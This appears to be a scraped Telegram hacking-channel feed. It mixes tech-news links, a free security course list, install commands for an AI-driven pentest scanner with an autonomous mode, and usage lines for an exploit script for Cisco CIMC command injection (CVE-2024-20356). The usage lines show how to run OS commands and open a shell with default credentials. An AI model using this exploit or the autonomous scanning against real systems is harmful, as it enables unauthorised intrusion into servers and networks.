Forwarded from Exploiting Crew (Pr1vAt3)
🦑 AI-powered ethical hacking :
: Features
- Natural Language Processing : Executes commands based on user input, translating intent into action seamlessly.
- Command Search Engine : Facilitates the search for services, ports, or specific terms, providing curated command suggestions to identify vulnerabilities.
» Supported Ethical Hacking Tools :
1. NMAP : Network discovery and security auditing.
2. OWASP ZAP (Full Scan Only) : Web application security scanner.
3. Crackmapexec : Network information gathering.
4. Nuclei : Template-based fast scanning with zero false positives.
» Compatibility
- Optimized for Linux : Fully functional on Linux platforms.
- Limited/No Support : Functionality on Windows or macOS is not guaranteed.
System Requirements
Non-Docker Installation
- Storage : 50GB
- RAM : 16GB minimum
- GPU : 8GB recommended for optimal performance.
» Dependencies
- Linux (Debian-based) :
- Installations:
- Git-based exploitdb:
»Installation
Docker Installation
1. Pulling the image :
2. Running without GPU :
3. Running with GPU :
4. Autonomous mode :
- Default vulnerability scan:
- Custom NMAP vulnerability scan:
PIP Installation
1. Install:
2. Run:
3. For elevated privileges:
» Linux Post-Installation
1. Add the installation path to your
Nebula-Watcher (Optional Component)
PIP Installation
Docker Installation
1. Pull the image:
2. Run:
Customize diagram name:
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
: Features
- Natural Language Processing : Executes commands based on user input, translating intent into action seamlessly.
- Command Search Engine : Facilitates the search for services, ports, or specific terms, providing curated command suggestions to identify vulnerabilities.
» Supported Ethical Hacking Tools :
1. NMAP : Network discovery and security auditing.
2. OWASP ZAP (Full Scan Only) : Web application security scanner.
3. Crackmapexec : Network information gathering.
4. Nuclei : Template-based fast scanning with zero false positives.
» Compatibility
- Optimized for Linux : Fully functional on Linux platforms.
- Limited/No Support : Functionality on Windows or macOS is not guaranteed.
System Requirements
Non-Docker Installation
- Storage : 50GB
- RAM : 16GB minimum
- GPU : 8GB recommended for optimal performance.
» Dependencies
- Linux (Debian-based) :
- Installations:
sudo apt -y install exploitdb libreadline-dev wget nmap crackmapexec nuclei
- Git-based exploitdb:
sudo git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
»Installation
Docker Installation
1. Pulling the image :
docker pull berylliumsec/nebula:latest
2. Running without GPU :
docker run --rm -it berylliumsec/nebula:latest
3. Running with GPU :
docker run --rm --gpus all -v "$(pwd)":/app/unified_models_no_zap -it berylliumsec/nebula:latest
4. Autonomous mode :
- Default vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --targets_list /app/targets.txt
- Custom NMAP vulnerability scan:
docker run --rm --gpus all -v "$(pwd)/targets.txt":/app/targets.txt -v "$(pwd)"/unified_models:/app/unified_models -it nebula:latest --autonomous_mode True --nmap_vuln_scan_command="nmap -Pn -sV --exclude-ports 21 --script=vulscan/vulscan.nse" --targets_list /app/targets.txt
PIP Installation
1. Install:
pip install nebula-ai
2. Run:
nebula
3. For elevated privileges:
sudo pip install nebula-ai
sudo nebula
» Linux Post-Installation
1. Add the installation path to your
.zshrc:export PATH="$HOME/.local/bin:$PATH"
Nebula-Watcher (Optional Component)
PIP Installation
pip3 install nebula-watcher
Docker Installation
1. Pull the image:
docker pull berylliumsec/nebula_watcher:latest
2. Run:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest
Customize diagram name:
docker run --network host -v /path/to/nmap_results:/app/results -v /path/to/output:/app/output berylliumsec/nebula_watcher:latest python3 nebula_watcher.py --diagram_name /app/your_diagram_name
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
#Google's Project Astra: A Glimpse into the Future of #AI
https://undercodenews.com/googles-project-astra-a-glimpse-into-the-future-of-ai/
@Undercode_News
https://undercodenews.com/googles-project-astra-a-glimpse-into-the-future-of-ai/
@Undercode_News
UNDERCODE NEWS
Google's Project Astra: A Glimpse into the Future of AI - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ The Intersection of CTMU and QCI: A New Frontier in Emergent Intelligence
https://undercodenews.com/the-intersection-of-ctmu-and-qci-a-new-frontier-in-emergent-intelligence/
@Undercode_News
https://undercodenews.com/the-intersection-of-ctmu-and-qci-a-new-frontier-in-emergent-intelligence/
@Undercode_News
UNDERCODE NEWS
The Intersection of CTMU and QCI: A New Frontier in Emergent Intelligence - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔋 aarnâ Launches #AI-Powered #Crypto Investment Product, âfi 802
https://undercodenews.com/aarna-launches-ai-powered-crypto-investment-product-afi-802/
@Undercode_News
https://undercodenews.com/aarna-launches-ai-powered-crypto-investment-product-afi-802/
@Undercode_News
UNDERCODE NEWS
aarnâ Launches AI-Powered Crypto Investment Product, âfi 802 - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 Bitcoin Core Integration and Development:
>> What is Bitcoin Core?
Bitcoin Core is the reference implementation of Bitcoin, connecting to the peer-to-peer Bitcoin network. Its primary functions include:
- Downloading and fully validating blocks and transactions.
- Serving as a wallet.
- Providing an optional graphical user interface (GUI).
Binary versions are available for immediate use at [Bitcoin Core Downloads](https://bitcoincore.org/en/download/).
>> Licensing
Bitcoin Core is licensed under the MIT License, allowing free use and modification. Details can be found in the
>> Development Process
- Master Branch: Continuously built and tested but may not always be stable.
- Release Branches and Tags: Created regularly to mark stable releases.
- GUI Development: Exclusively managed in the [bitcoin-core/gui repository](https://github.com/bitcoin-core/gui). This repository mirrors the monotree's master branch and does not have release branches or tags.
>># Contribution
Developers can follow the workflow in
>> Testing and Quality Assurance
>># Automated Testing:
1. Unit Tests: Recommended for all new code and improvements to existing code. Use
2. Regression and Integration Tests: Written in Python, executed with:
3. CI Systems: Automatically test pull requests across Windows, Linux, and macOS platforms.
>># Manual Testing:
- Requires a reviewer distinct from the code author, particularly for substantial or high-risk changes.
- Adding a clear test plan in pull request descriptions is encouraged for complex changes.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
>> What is Bitcoin Core?
Bitcoin Core is the reference implementation of Bitcoin, connecting to the peer-to-peer Bitcoin network. Its primary functions include:
- Downloading and fully validating blocks and transactions.
- Serving as a wallet.
- Providing an optional graphical user interface (GUI).
Binary versions are available for immediate use at [Bitcoin Core Downloads](https://bitcoincore.org/en/download/).
>> Licensing
Bitcoin Core is licensed under the MIT License, allowing free use and modification. Details can be found in the
COPYING file or at the [MIT License site](https://opensource.org/licenses/MIT).>> Development Process
- Master Branch: Continuously built and tested but may not always be stable.
- Release Branches and Tags: Created regularly to mark stable releases.
- GUI Development: Exclusively managed in the [bitcoin-core/gui repository](https://github.com/bitcoin-core/gui). This repository mirrors the monotree's master branch and does not have release branches or tags.
>># Contribution
Developers can follow the workflow in
CONTRIBUTING.md. Additional insights and guidelines are in doc/developer-notes.md.>> Testing and Quality Assurance
>># Automated Testing:
1. Unit Tests: Recommended for all new code and improvements to existing code. Use
ctest to compile and run unit tests.2. Regression and Integration Tests: Written in Python, executed with:
build/test/functional/test_runner.py
3. CI Systems: Automatically test pull requests across Windows, Linux, and macOS platforms.
>># Manual Testing:
- Requires a reviewer distinct from the code author, particularly for substantial or high-risk changes.
- Adding a clear test plan in pull request descriptions is encouraged for complex changes.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Bitcoin Core
Download - Bitcoin
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🛠️ #Google's Quantum Leap: Willow Chip and Error Correction Breakthrough
https://undercodenews.com/googles-quantum-leap-willow-chip-and-error-correction-breakthrough/
@Undercode_News
https://undercodenews.com/googles-quantum-leap-willow-chip-and-error-correction-breakthrough/
@Undercode_News
UNDERCODE NEWS
Google's Quantum Leap: Willow Chip and Error Correction Breakthrough - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🚨 #Data Breach Exposes Sensitive Information of 446,000 Patients at Center for Vein Restoration
https://undercodenews.com/data-breach-exposes-sensitive-information-of-446000-patients-at-center-for-vein-restoration/
@Undercode_News
https://undercodenews.com/data-breach-exposes-sensitive-information-of-446000-patients-at-center-for-vein-restoration/
@Undercode_News
UNDERCODE NEWS
Data Breach Exposes Sensitive Information of 446,000 Patients at Center for Vein Restoration - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🛡️ Chinese Hacker Charged for Targeting Sophos Firewalls
https://undercodenews.com/chinese-hacker-charged-for-targeting-sophos-firewalls/
@Undercode_News
https://undercodenews.com/chinese-hacker-charged-for-targeting-sophos-firewalls/
@Undercode_News
UNDERCODE NEWS
Chinese Hacker Charged for Targeting Sophos Firewalls - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
🦑100% FREE classes for a pathway into cybersecurity and ethical hacking
Foundations:
Help Desk
➡️TCM Security Academy – Practical Help Desk (https://lnkd.in/geDEvt6d)
➡️Professor Messer – 220-1101 and 220-1102 A+ Courses (https://lnkd.in/gKjJsSPz & https://lnkd.in/gMW3hMsv)
Networking
➡️Professor Messer – N10-009 Network+ Course (https://lnkd.in/g8mYZaMm)
➡️Cisco Networking Academy – Packet Tracer (https://lnkd.in/guGibYx6)
Linux
➡️TCM Security Academy – Linux 100: Fundamentals (https://lnkd.in/gEGHzxw3)
➡️Linux Journey (https://linuxjourney.com/)
➡️OverTheWire – Bandit (https://lnkd.in/gRwPsump)
Programming
➡️TCM Security – Programming 100: Fundamentals (https://lnkd.in/gWZe2JRj)
➡️FreeCodeCamp (https://lnkd.in/gbaHhV34)
➡️Codecademy (https://lnkd.in/gxAHnTFD)
Security Essentials
➡️Professor Messer – SY0-701 Security+ Course (https://lnkd.in/gfCCMJqQ)
Hacking Essentials
➡️Ethical Hacking in 15 Hours Part 1 (https://lnkd.in/gWump_cZ)
➡️Ethical Hacking in 15 Hours Part 2 (https://lnkd.in/gH9_Ap7F)
➡️TryHackMe (https://tryhackme.com/)
Active Directory Hacking
➡️How to Build an Active Directory Hacking Lab (https://lnkd.in/g_9wjzhz)
➡️Hacking Active Directory for Beginners (https://lnkd.in/gaewN7nU)
Web Application Hacking
➡️PortSwigger Web Security Academy (https://lnkd.in/gvx6NgcZ)
➡️Hacker101 (https://www.hacker101.com/)
➡️Bugcrowd University (https://lnkd.in/g_aPUcD8)
Ref: Heath Adams
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Foundations:
Help Desk
➡️TCM Security Academy – Practical Help Desk (https://lnkd.in/geDEvt6d)
➡️Professor Messer – 220-1101 and 220-1102 A+ Courses (https://lnkd.in/gKjJsSPz & https://lnkd.in/gMW3hMsv)
Networking
➡️Professor Messer – N10-009 Network+ Course (https://lnkd.in/g8mYZaMm)
➡️Cisco Networking Academy – Packet Tracer (https://lnkd.in/guGibYx6)
Linux
➡️TCM Security Academy – Linux 100: Fundamentals (https://lnkd.in/gEGHzxw3)
➡️Linux Journey (https://linuxjourney.com/)
➡️OverTheWire – Bandit (https://lnkd.in/gRwPsump)
Programming
➡️TCM Security – Programming 100: Fundamentals (https://lnkd.in/gWZe2JRj)
➡️FreeCodeCamp (https://lnkd.in/gbaHhV34)
➡️Codecademy (https://lnkd.in/gxAHnTFD)
Security Essentials
➡️Professor Messer – SY0-701 Security+ Course (https://lnkd.in/gfCCMJqQ)
Hacking Essentials
➡️Ethical Hacking in 15 Hours Part 1 (https://lnkd.in/gWump_cZ)
➡️Ethical Hacking in 15 Hours Part 2 (https://lnkd.in/gH9_Ap7F)
➡️TryHackMe (https://tryhackme.com/)
Active Directory Hacking
➡️How to Build an Active Directory Hacking Lab (https://lnkd.in/g_9wjzhz)
➡️Hacking Active Directory for Beginners (https://lnkd.in/gaewN7nU)
Web Application Hacking
➡️PortSwigger Web Security Academy (https://lnkd.in/gvx6NgcZ)
➡️Hacker101 (https://www.hacker101.com/)
➡️Bugcrowd University (https://lnkd.in/g_aPUcD8)
Ref: Heath Adams
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ #Google Workspace: A New #AI-Powered Productivity
https://undercodenews.com/google-workspace-a-new-ai-powered-productivity/
@Undercode_News
https://undercodenews.com/google-workspace-a-new-ai-powered-productivity/
@Undercode_News
UNDERCODE NEWS
Google Workspace: A New AI-Powered Productivity - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
Informative #Samsung #Galaxy S23 Series: A Closer Look at the Exynos 2200 Chipset
https://undercodenews.com/informative-samsung-galaxy-s23-series-a-closer-look-at-the-exynos-2200-chipset/
@Undercode_News
https://undercodenews.com/informative-samsung-galaxy-s23-series-a-closer-look-at-the-exynos-2200-chipset/
@Undercode_News
UNDERCODE NEWS
Informative Samsung Galaxy S23 Series: A Closer Look at the Exynos 2200 Chipset - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🔋 #Tesla Stock Charges Towards Record Highs as 2024 Nears Close
https://undercodenews.com/tesla-stock-charges-towards-record-highs-as-2024-nears-close/
@Undercode_News
https://undercodenews.com/tesla-stock-charges-towards-record-highs-as-2024-nears-close/
@Undercode_News
UNDERCODE NEWS
Tesla Stock Charges Towards Record Highs as 2024 Nears Close - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ #Samsung Delays One UI 70 Beta #Update for #Galaxy S24 Series
https://undercodenews.com/samsung-delays-one-ui-70-beta-update-for-galaxy-s24-series/
@Undercode_News
https://undercodenews.com/samsung-delays-one-ui-70-beta-update-for-galaxy-s24-series/
@Undercode_News
UNDERCODE NEWS
Samsung Delays One UI 70 Beta Update for Galaxy S24 Series - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from Exploiting Crew (Pr1vAt3)
CVE-2024-20356.py
10.5 KB
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Command Injection vulnerability in Cisco's CIMC:
>> Use it for testing purposes only !!!
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
>> Use it for testing purposes only !!!
CVE-2024-20356.py [-h] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-c CMD] [-v]
options:
-h, --help Show this help message and exit
-t HOST, --host HOST Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
-u USERNAME, --username USERNAME
Username (default: admin)
-p PASSWORD, --password PASSWORD
Password (default: cisco)
-a ACTION, --action ACTION
Action: test, cmd, shell, dance (default: test)
-c CMD, --cmd CMD OS command to run (Default: NONE)
-v, --verbose Displays more information about cimc
Example commands:
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -v
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -c 'id'
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a shell
CVE-2024-20356.py --host 192.168.x.x -u admin -p your_password -a dance
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 Elon Musk: The Internet Visionary
https://undercodenews.com/elon-musk-the-internet-visionary/
@Undercode_News
https://undercodenews.com/elon-musk-the-internet-visionary/
@Undercode_News
UNDERCODE NEWS
Elon Musk: The Internet Visionary - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
🌐 A Hilariously Honest Wedding Invite Takes the Internet by Storm
https://undercodenews.com/a-hilariously-honest-wedding-invite-takes-the-internet-by-storm/
@Undercode_News
https://undercodenews.com/a-hilariously-honest-wedding-invite-takes-the-internet-by-storm/
@Undercode_News
UNDERCODE NEWS
A Hilariously Honest Wedding Invite Takes the Internet by Storm - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…
Forwarded from UNDERCODE NEWS (Copyright & Fact Checker)
⚡️ Airtel Introduces New Prepaid Plan with Hotstar Mobile
https://undercodenews.com/airtel-introduces-new-prepaid-plan-with-hotstar-mobile/
@Undercode_News
https://undercodenews.com/airtel-introduces-new-prepaid-plan-with-hotstar-mobile/
@Undercode_News
UNDERCODE NEWS
Airtel Introduces New Prepaid Plan with Hotstar Mobile - UNDERCODE NEWS
Undercode News was founded in order to provide the most useful information in the world of hacking and technology. Staffed 24/24 hours, seven days a week by a dedicated team in undercode around the world, so it can provide an environment of information and…